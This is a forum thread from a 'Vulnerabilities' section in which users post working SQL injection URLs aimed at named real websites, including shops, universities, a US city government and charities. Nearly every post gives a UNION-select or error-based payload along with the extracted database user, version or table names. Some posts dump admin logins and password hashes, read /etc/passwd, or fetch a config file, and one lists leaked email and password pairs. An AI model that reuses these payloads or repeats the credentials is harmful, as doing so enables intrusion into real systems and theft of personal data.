SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Amoura

    Code:
    http://www.nasha-spravka.ru/?abc=2&city=-129+union+select+concat_ws%280x3a,database%28%29,version%28%29,user%28%29%29--
    spravka_2:5.1.56:spravka_2@localhost


    Code:
    http://vsemisto.com.ua/index.php?page=2&id=4643+union+select+1,2,3,concat_ws%280x3a,database%28%29,version%28%29,user%28%29%29,5,6,7,8,9,10,11,12,13,14,15--
    dovidka_vm:5.1.47-community-log:dovidka_user@webua1.ukrhosting.com
     
    #13801 Amoura, 27 Apr 2011
    Last edited: 27 Apr 2011
    1 person likes this.
  2. winstrool

    5.0.86:fanfooty@localhost:fanfooty

    5.1.47-community-log:xaoonet_super@localhost:xaoonet_super

    5.0.51a:db_java_bookz@localhost:db_java_bookz
     
    _________________________
    #13802 winstrool, 27 Apr 2011
    Last edited: 27 Apr 2011
    1 person likes this.
  3. шкoльнек

    4.1.21-log : udb5600 : Uwww5600S@localhost
     
  4. ubi


    http://www.arabdetroit.com/news.php?id=-27335'+union+select+1,concat_ws(0x3a,user,password),3,4,5,6,7,8+from+config--+
    PR 5
    Did not decrypt the hashes.
     
    #13804 ubi, 28 Apr 2011
    Last edited: 28 Apr 2011
  5. LiRvD082

    Admin31da206ea6d47ec8a5e979b6bf44d681:pedro1954

    nadeem:khan,mudit123:muditmisra,shivani@magnifix.co.nz:5767571,marc@magnifix.co.nz:2650070,mudit@magnifix.co.nz:navya28,satwinder@magnifix.co.nz:2650070,darshak@magnifix.co.nz:2650070
     
  6. randman

    PR-6
    Code:
    http://www.tvigle.ru/category/cinema/video/?sort=-1884%29%29+union+select+1,2,concat_ws%280x3a,id,name,email,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+tvigle_rf.be_user+limit+20,1000+--+
     
  7. Amoura

    Code:
    http://www.womencraftlink.net/showFoto.php?galName=galerie_6&id=134+union+select+1,2,concat_ws%280x3a,database%28%29,version%28%29,user%28%29%29,4,5,6,7,8--
    peyer_main:5.0.51a-24+lenny5:peyer@localhost
     
    1 person likes this.
  8. DezMond™

    linn.dlrg.de
    Code:
    http://linn.dlrg.de/termine.html?tx_dlrgterminkalender_pi1%5Baction%5D=read&tx_dlrgterminkalender_pi1%5Btid%5D=-51+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+&cHash=b6bf96f6dac665abaea06aea2e150c3c
    abayan.de PR3
    Code:
    http://www.abayan.de/index.php?id=4&no_cache=1&cmode=99&pg=&mode=3&lanid=1180&anbid=1063&erzid=1180+union+select+1,2,3,4,5,id,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+user+--+&cHash=f4dbe36977d98285737a48d8aa7cb3a3
    kindermissionswerk.de PR5
    Code:
    http://kindermissionswerk.de/shop/index.php?sessionid=39409321486eb6f3a00e66a0623f1e61&kat=-99+union+select+1,2,3,4,5,group_concat(table_name),7,8,9,10,11,12,13+from+information_schema.tables+group+by+table_schema+limit+0,1+--+&actiontyp=artikelinwarenkorb
    neoriginal.ru TIC 50
    Code:
    http://www.neoriginal.ru/cat/audi/part/u/0/mod/77/kat/264/year/2004/grp/1/idcnt/15/subgrp/-24431+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.tables+--+
    feierwerk.de PR4
    Code:
    http://feierwerk.de/angebote/dschungelpalast/programm/details.html?tx_wfqbe_pi1%5Beid%5D=1967+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+information_schema.tables+--+
    asso.angers.fr PR4
    Code:
    http://asso.angers.fr/detail_asso.php?id_asso=-5974+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,login,20,21,22,23,24,25,26+from+admin+--+
    campus.igw.edu
    Code:
    http://campus.igw.edu/kursliste/kurse_detail.php?kursID=-4411+union+select+1,2,3,4,5,6,LOAD_FILE(0x2F6574632F706173737764),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65+--+&SN=wvimqrfaf
    contrefacon-danger.com PR7
    Code:
    http://www.contrefacon-danger.com/front/show_rub.php?rub_id=260&archive=0'+union+select+1,2,3,4,5,6,unhex(hex(user())),8,9,10,11,12,13+--+
    zenar.boku.ac.at PR5
    Code:
    http://zenar.boku.ac.at/en/links/links_detail.php?ID=-1+union+select+1,2,3,4,5,6+--+
    wallawalla.edu PR5
    Code:
    http://www.wallawalla.edu/academics/library/typo3/showdescr.html?ID=-22'+union+select+1,2+--+
    site.medair.org
    Code:
    http://site.medair.org/en_portal/hr/job/job_details_hq.php?jcode=-CH_HQS_GAM'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+/*+
    bioinf-applied.charite.de
    Code:
    http://bioinf-applied.charite.de/fragment_store/src/download.php?fragment_id=-374+union+select+user()+--+
    esellers-guide.de PR2
    Code:
    http://esellers-guide.de/index.php?page=view_text&type=articles&category=19&pre_category=1&text_id=-37'+union+select+1,2,3,4,5,6,7,8+--+
    fondation-saint-hubert.be PR4
    Code:
    http://www.fondation-saint-hubert.be/visu.php?cible=-18+union+select+1,2,3,4,5,6+--+
    suurmond.be PR2
    Code:
    http://www.suurmond.be/producten/groep.php?groepid=-50+union+select+1,2,3,4,5,6,7,8,9,10,11+--+&merk=0'
    dmc.metu.edu PR5
    Code:
    http://www.dmc.metu.edu/DMC/download.php?fname=./config.php
     
    2 people like this.
  9. winstrool

    output in the page source:
    zaward@zaward.com5.0.51a-3ubuntu5.8db_zaward

    5.0.89-log:u6351@be2:u6351
     
    _________________________
    #13809 winstrool, 29 Apr 2011
    Last edited: 29 Apr 2011
    2 people like this.
  10. Melfis

    PR3
    Code:
    http://www.dushka.ru/gstore.phtm?g=-11+union+select+1,version()--
    almost the entire hosting is affected by this
     
    #13810 Melfis, 29 Apr 2011
    Last edited: 29 Apr 2011
  11. winstrool

    PR: 4
     
    _________________________
    #13811 winstrool, 30 Apr 2011
    Last edited by a moderator: 30 Apr 2011
  12. Cennarios

    EDU POWER =)

    http://www.esne.edu/noticias2.php?info=Noticias&Id=-354+union+select+1,user%28%29,3,4,5--+
     
    2 people like this.
  13. eclipse

    Freece.com : PR - 4

    MSSQL VERSION:Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64) Apr 2 2010 15:48:46 Copyright (c) Microsoft Corporation Web Edition (64-bit) on Windows NT 6.1 <X64> (Build 7600: )

    DATABASE:pharmcon
    USERNAME:pharmCon_reader
    VULN SCRIPT PATH:D:\www\FreeCE_classic\www\forum\Forum_Details.asp
    Exploit:
    IMPORTANT TABLES:
    tbEmailAddresses
    tbForum
    tbInstructors

    tblUsers
    -User_ID
    -UserName
    -Password
     
    3 people like this.
  14. Melfis



    .......
     
    #13814 Melfis, 30 Apr 2011
    Last edited by a moderator: 30 Apr 2011
    2 people like this.
  15. assinjeans

    http://www.azizbehich.com/news.php?id=-132+union+select+1,2,3,version(),user(),6,7,8,9,10+--
    version 4 =(
     
  16. ubi

    Code:
    http://sportpickgoods.com/view.php?id=-61738+union+select+1,concat_ws(0x3a,name,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+tb_admin--+
     
    2 people like this.
  17. Dr..VATSON

    Code:
    http://www.elavik.ru/catalog.php?action=goods&id=-177+union+select+version%28%29,2+--+
    5.1.41-log
     
    1 person likes this.
  18. Cennarios

    gov*no

    http://www.bryantx.gov/include/press_release.asp?id=-1107/**//*!union*//**//*!select*//**/1,2,3,4,5,6,7,8,user%28%29,10,11,12--+
     
    1 person likes this.
  19. Osstudio

    http://portalxm.com/index.php?id=1'+and+1=0+union+select+1,2,3,group_concat(table_name+separator+0x3a),5,6,7,8,9+from+information_schema.tables+where+table_schema=0x76696e746167645f617a697a/*
     
  20. Tigger

    TIC 600
    http://www.efko.ru/page.php?id=37'+union+all+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,user(),database(),version())--+

    Output in Location: The requested URL /newefko@localhost:newefko2:5.0.77-log was not found on this server.

    -------------------
    EDU:
    http://casgroup.fiu.edu/dll/events.php?id=459+and+1=2+union+select+1,UNHEX(HEX(concat_ws(0x3a,user(),database(),version()))),3,4,5,6,7,8,9--+

    casweb@GOPANTHER.fiu.edu:cas:4.1.14-nt-log

    -------------------

    http://globalanuncio.com/view.php?id=56688+and+1=2+UnIon+selECt+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,user(),version(),database()),13,14,15,16,17,18,19,20,21--+

    globaldbuser@localhost:5.0.77:globalanuncio

    -------------------

    http://onlineoffshore.info/RU/juridiction/index.php?LG=RU&JURI=bbb'+UNION+SELECT+1,2,3,concat_ws(0x3a,user(),version(),database())--+

    calculator@cgi1401.int.bizland.net:5.0.91-log:onlineoffshoredb

    ------------------

    http://pole1.ru/tovar.php?id=8+and+1=2+union+select+1,2,UNHEX(HEX(concat_ws(0x3a,user(),version(),database()))),4,5,6,7--+

    aqq7328_strina@localhost:5.0.92-community-log:aqq7328_lopata

    "Miracle shovel" :D

    --------------------

    Shop

    http://www.arttoframes.com/cartmanager_search.php?parent_sku=cdm-144-FRBW26061&size=36x12&color=215'+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(version(),floor(rand(0)*2)))--+

    Duplicate entry '5.0.451' for key 1

    -----------------

    http://www.bienesonline.com/venezuela/inmobiliarias.php?ID=15+and+1=2+union+select+concat_ws(0x3a,user(),version(),database())--+

    admin_bieneson@localhost:5.0.67-community-log:admin_bienes_venezuela

    -----------------

    http://www.birdjam.com/article.php?gid=0'&hilow=asc&monyr=4-2011&page=twitch_hiscores'+and+1=2+union+select+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10,11--+

    birdjam2@localhost:5.0.27:birdjam2

    -----------------

    http://www.cymbalhouse.com/shopping/pgm-more_information.php?id=1602'+and+1=2+/*!UnIon*/+selECt+1,2,3,4,5,6,7,concat_ws(0x3a,user(),version(),database()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51--+

    zilze3_sope1@localhost:5.1.52:zilze3_sope1

    -------------------

    ВсеМайки.РУ - a large T-shirt sales site with its own affiliate program.

    http://www.vsemayki.ru/basket_to.php?id=795'+and+1=2+union+select+concat_ws(0x3a,user(),version(),database()),2--+&color=red&size=M%20%2846-48%29&model=man&hand=short&num=1

    vsemayki_ru@server.vsemayki.ru:5.1.50-rel11.4-log:vsemayki_ru

    ------------------

    http://www.smdailyjournal.com/article_preview.php?id=66988+and+1=2+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15--+

    smdaily2@localhost:4.0.25:smdaily2
     
    #13820 Tigger, 2 May 2011
    Last edited: 2 May 2011
    4 people like this.